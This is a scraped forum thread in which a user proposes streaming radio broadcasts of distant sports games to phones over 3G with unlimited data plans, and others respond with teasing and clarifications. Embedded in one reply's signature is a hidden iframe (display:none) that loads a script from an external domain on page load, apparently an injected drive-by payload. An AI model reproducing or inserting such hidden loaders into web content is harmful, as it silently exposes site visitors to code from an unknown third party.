+ Reply to Thread
    PHO
    Broward County Florida, "Home of the Hanging Chad"

Killer app - Something to Cell (pun intended)

I realized yesterday in my car, that a killer app would be the use of Media player. Then i could listen to any sports game in the country that is on a radio station on my phone.

we would need unlimited data. But, you could be at a Dolphins game and listen to a Vikings Game, or baseball, ect. ect. ect.

3g should be able to handle this data speed. an unlimited plan would be nessecary. But this is something that you could sell people with wireless web and mass numbers of people would be interested.

as we all know, sex and sports sell AND why does everyone get satalite, so they can get all the games

Ok, someone needs to pay me for this now, and start the add blitz and they could have a "sports package" where they give unlimited data and set up a special porthole - "it would be easy to set up and some suckers might even think there gettin something.

Ok, seriously someone needs to pay me now. Sprint? Att? You Listening?

Aaron<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Napoleon Bonaparte Jr.

hello

PHO

I realized yesterday ..........we would need unlimited data.
    .................................................................................

Took time to realize ... he he

"I realized yesterday in my car, that a killer app would be the use of Media player. Then i could listen to any sports game in the country that is on a radio station on my phone. "

Sounds good.....let us all know when you have finished writing the program!! I for one will gladly pay you for all the effort and years of school you put in to be able to write such a complex application.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    I wish i could write.

I was saying pay me for the Idea, Like Sprint pay me to figure out the way to sell there service, because i don't think the picture thing will apply to the masses.

This is the first time i am now seriously looking at a microsoft based unit.

Rrrrr
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."